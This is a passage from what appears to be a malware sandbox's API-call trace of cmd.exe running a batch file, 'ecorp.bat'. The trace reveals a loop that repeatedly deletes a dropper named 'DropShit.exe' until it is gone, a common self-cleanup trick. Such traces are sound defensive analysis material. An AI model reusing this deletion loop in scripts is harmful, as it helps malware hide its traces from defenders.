lpDistanceToMoveHigh=0x0) returned 0x0 [0091.852] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.852] GetFileType (hFile=0x5c) returned 0x1 [0091.852] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.853] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x51, lpOverlapped=0x0) returned 1 [0091.853] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.853] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=9, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr=":Repeat\r\n.bat\r\n") returned 9 [0091.853] _close (_FileHandle=3) returned 0 [0091.853] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.853] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0091.853] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.853] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0091.853] _get_osfhandle (_FileHandle=0) returned 0x3 [0091.853] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0091.853] SetConsoleInputExeNameW () returned 0x1 [0091.853] GetConsoleOutputCP () returned 0x1b5 [0091.853] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0091.854] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.854] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.854] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.854] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.854] GetProcessHeap () returned 0x250000 [0091.854] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0091.854] GetProcessHeap () returned 0x250000 [0091.854] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278ff0 | out: hHeap=0x250000) returned 1 [0091.854] GetProcessHeap () returned 0x250000 [0091.854] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278fc0 | out: hHeap=0x250000) returned 1 [0091.854] GetProcessHeap () returned 0x250000 [0091.854] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278f90 | out: hHeap=0x250000) returned 1 [0091.854] GetProcessHeap () returned 0x250000 [0091.854] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251a80 | out: hHeap=0x250000) returned 1 [0091.854] GetProcessHeap () returned 0x250000 [0091.854] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251a40 | out: hHeap=0x250000) returned 1 [0091.854] GetProcessHeap () returned 0x250000 [0091.854] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0091.854] GetProcessHeap () returned 0x250000 [0091.854] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x264610 | out: hHeap=0x250000) returned 1 [0091.854] GetProcessHeap () returned 0x250000 [0091.854] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251980 | out: hHeap=0x250000) returned 1 [0091.854] GetProcessHeap () returned 0x250000 [0091.854] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2645e0 | out: hHeap=0x250000) returned 1 [0091.854] GetProcessHeap () returned 0x250000 [0091.854] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0091.854] GetProcessHeap () returned 0x250000 [0091.854] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2518c0 | out: hHeap=0x250000) returned 1 [0091.854] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.854] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.855] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x48, lpOverlapped=0x0) returned 1 [0091.855] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.855] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=20, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="del \"DropShit.exe\"\r\nxe\" goto Repeat\r\n") returned 20 [0091.855] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.855] GetFileType (hFile=0x5c) returned 0x1 [0091.855] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.855] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.855] GetProcessHeap () returned 0x250000 [0091.855] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x27a760 [0091.855] GetProcessHeap () returned 0x250000 [0091.855] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a760 | out: hHeap=0x250000) returned 1 [0091.855] GetProcessHeap () returned 0x250000 [0091.855] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cf30 [0091.855] GetProcessHeap () returned 0x250000 [0091.855] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x27a2f0 [0091.856] GetProcessHeap () returned 0x250000 [0091.856] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266a60 [0091.856] _tell (_FileHandle=3) returned 29 [0091.856] _close (_FileHandle=3) returned 0 [0091.856] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0091.856] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.856] GetFileType (hFile=0x7) returned 0x2 [0091.856] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.856] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0091.856] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.856] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0091.857] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.857] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0091.857] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0091.857] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.857] GetFileType (hFile=0x7) returned 0x2 [0091.857] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.857] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0091.858] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.858] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0091.858] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.858] GetFileType (hFile=0x7) returned 0x2 [0091.858] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.858] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef98 | out: lpMode=0x14ef98) returned 1 [0091.858] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.858] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x27a300*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efd8, lpReserved=0x0 | out: lpBuffer=0x27a300*, lpNumberOfCharsWritten=0x14efd8*=0x3) returned 1 [0091.858] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer=" \"DropShit.exe\" ") returned 16 [0091.858] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.858] GetFileType (hFile=0x7) returned 0x2 [0091.859] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.859] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.859] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.859] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x10) returned 1 [0091.859] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0091.859] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.859] GetFileType (hFile=0x7) returned 0x2 [0091.859] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.859] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.859] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.860] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0091.860] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0091.860] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0091.860] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0091.860] GetConsoleTitleW (in: lpConsoleTitle=0x14ed00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.860] GetProcessHeap () returned 0x250000 [0091.860] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x26ccf0 [0091.860] GetProcessHeap () returned 0x250000 [0091.860] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x26ccf0, Size=0x30) returned 0x26ccf0 [0091.860] GetProcessHeap () returned 0x250000 [0091.860] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x26ccf0) returned 0x30 [0091.860] GetProcessHeap () returned 0x250000 [0091.860] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x38) returned 0x266aa0 [0091.860] GetProcessHeap () returned 0x250000 [0091.860] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x26cd30 [0091.860] GetProcessHeap () returned 0x250000 [0091.860] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x26cd30, Size=0x30) returned 0x26cd30 [0091.860] GetProcessHeap () returned 0x250000 [0091.860] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x26cd30) returned 0x30 [0091.860] GetProcessHeap () returned 0x250000 [0091.861] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266ae0 [0091.861] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14e860 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.861] GetProcessHeap () returned 0x250000 [0091.861] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x26cd70 [0091.861] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14d770 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.861] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14e280, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0091.861] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0091.861] GetProcessHeap () returned 0x250000 [0091.861] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x26cdd0 [0091.861] GetProcessHeap () returned 0x250000 [0091.861] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x2518c0 [0091.861] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0091.861] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0091.861] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0091.861] GetProcessHeap () returned 0x250000 [0091.861] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x251b30 [0091.861] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x251b40 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.861] SetErrorMode (uMode=0x0) returned 0x0 [0091.861] SetErrorMode (uMode=0x1) returned 0x0 [0091.861] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x104, lpBuffer=0x14d790, lpFilePart=0x14d780 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14d780*="DropShit.exe") returned 0x32 [0091.861] SetErrorMode (uMode=0x0) returned 0x1 [0091.861] GetProcessHeap () returned 0x250000 [0091.861] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x26ef00 [0091.861] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0091.861] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0091.861] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0091.862] GetProcessHeap () returned 0x250000 [0091.862] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266b20 [0091.862] GetProcessHeap () returned 0x250000 [0091.862] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26ce30 [0091.862] GetProcessHeap () returned 0x250000 [0091.862] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26f170 [0091.862] GetProcessHeap () returned 0x250000 [0091.862] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x810) returned 0x26f1e0 [0091.862] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x0, lpFindFileData=0x26f1f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f1f4) returned 0x26cea0 [0091.862] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0091.862] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0091.862] GetLastError () returned 0x5 [0091.862] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x14dc38 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe\r\n") returned 52 [0091.862] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.862] GetFileType (hFile=0x7) returned 0x2 [0091.862] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.862] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14dbc8 | out: lpMode=0x14dbc8) returned 1 [0091.863] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.863] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14dc08, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14dc08*=0x34) returned 1 [0091.863] _get_osfhandle (_FileHandle=2) returned 0xb [0091.863] GetFileType (hFile=0xb) returned 0x2 [0091.863] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0091.863] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14db68 | out: lpMode=0x14db68) returned 1 [0091.863] _get_osfhandle (_FileHandle=2) returned 0xb [0091.864] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14dba0 | out: lpConsoleScreenBufferInfo=0x14dba0) returned 1 [0091.864] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0091.864] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x14dc10 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0091.864] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x14db90, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14db90*=0x13) returned 1 [0091.864] FindNextFileW (in: hFindFile=0x26cea0, lpFindFileData=0x26f1f4 | out: lpFindFileData=0x26f1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7a8400, ftCreationTime.dwHighDateTime=0x1d53bb1, ftLastAccessTime.dwLowDateTime=0xed131a80, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xeb495700, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x9600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DropShit.exe", cAlternateFileName="")) returned 0 [0091.865] GetLastError () returned 0x12 [0091.865] FindClose (in: hFindFile=0x26cea0 | out: hFindFile=0x26cea0) returned 1 [0091.865] GetProcessHeap () returned 0x250000 [0091.865] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26f1e0 | out: hHeap=0x250000) returned 1 [0091.865] GetProcessHeap () returned 0x250000 [0091.865] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26f170 | out: hHeap=0x250000) returned 1 [0091.865] GetProcessHeap () returned 0x250000 [0091.865] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266b20 | out: hHeap=0x250000) returned 1 [0091.865] GetProcessHeap () returned 0x250000 [0091.865] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ce30 | out: hHeap=0x250000) returned 1 [0091.865] GetProcessHeap () returned 0x250000 [0091.865] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ef00 | out: hHeap=0x250000) returned 1 [0091.865] GetProcessHeap () returned 0x250000 [0091.865] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251b30 | out: hHeap=0x250000) returned 1 [0091.865] GetProcessHeap () returned 0x250000 [0091.865] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2518c0 | out: hHeap=0x250000) returned 1 [0091.865] GetProcessHeap () returned 0x250000 [0091.865] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cdd0 | out: hHeap=0x250000) returned 1 [0091.865] GetProcessHeap () returned 0x250000 [0091.865] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cd70 | out: hHeap=0x250000) returned 1 [0091.865] GetProcessHeap () returned 0x250000 [0091.865] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266ae0 | out: hHeap=0x250000) returned 1 [0091.865] GetProcessHeap () returned 0x250000 [0091.865] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cd30 | out: hHeap=0x250000) returned 1 [0091.865] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.865] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0091.866] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.866] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0091.899] _get_osfhandle (_FileHandle=0) returned 0x3 [0091.899] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0091.899] SetConsoleInputExeNameW () returned 0x1 [0091.899] GetConsoleOutputCP () returned 0x1b5 [0091.899] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0091.899] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.899] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.900] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.900] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.900] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.900] GetProcessHeap () returned 0x250000 [0091.900] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0091.900] GetProcessHeap () returned 0x250000 [0091.900] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.900] GetProcessHeap () returned 0x250000 [0091.900] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0091.900] GetProcessHeap () returned 0x250000 [0091.900] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0091.900] GetProcessHeap () returned 0x250000 [0091.900] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf30 | out: hHeap=0x250000) returned 1 [0091.900] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.900] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.900] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x34, lpOverlapped=0x0) returned 1 [0091.900] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.900] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=37, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="if exist \"DropShit.exe\" goto Repeat\r\n") returned 37 [0091.900] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.900] GetFileType (hFile=0x5c) returned 0x1 [0091.900] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.900] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.900] GetProcessHeap () returned 0x250000 [0091.900] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x27a760 [0091.900] GetProcessHeap () returned 0x250000 [0091.900] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a760 | out: hHeap=0x250000) returned 1 [0091.900] GetProcessHeap () returned 0x250000 [0091.900] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cf30 [0091.900] GetProcessHeap () returned 0x250000 [0091.900] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x16) returned 0x27a2f0 [0091.901] GetProcessHeap () returned 0x250000 [0091.901] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x28) returned 0x2645e0 [0091.901] GetProcessHeap () returned 0x250000 [0091.901] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2645e0, Size=0x1e) returned 0x264610 [0091.901] GetProcessHeap () returned 0x250000 [0091.901] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x264610) returned 0x1e [0091.901] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0091.901] GetProcessHeap () returned 0x250000 [0091.901] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cff0 [0091.901] GetProcessHeap () returned 0x250000 [0091.901] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1c) returned 0x2645e0 [0091.901] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0091.901] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0091.901] GetProcessHeap () returned 0x250000 [0091.901] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x266a60 [0091.901] GetProcessHeap () returned 0x250000 [0091.901] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4c) returned 0x26ccf0 [0091.901] GetProcessHeap () returned 0x250000 [0091.901] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x26ccf0, Size=0x30) returned 0x26ccf0 [0091.901] GetProcessHeap () returned 0x250000 [0091.901] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x26ccf0) returned 0x30 [0091.901] GetProcessHeap () returned 0x250000 [0091.901] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26d0b0 [0091.901] GetProcessHeap () returned 0x250000 [0091.901] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x278f90 [0091.901] GetProcessHeap () returned 0x250000 [0091.901] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x20) returned 0x278fc0 [0091.902] _tell (_FileHandle=3) returned 66 [0091.902] _close (_FileHandle=3) returned 0 [0091.902] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0091.902] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.902] GetFileType (hFile=0x7) returned 0x2 [0091.902] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.902] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0091.902] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.902] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, 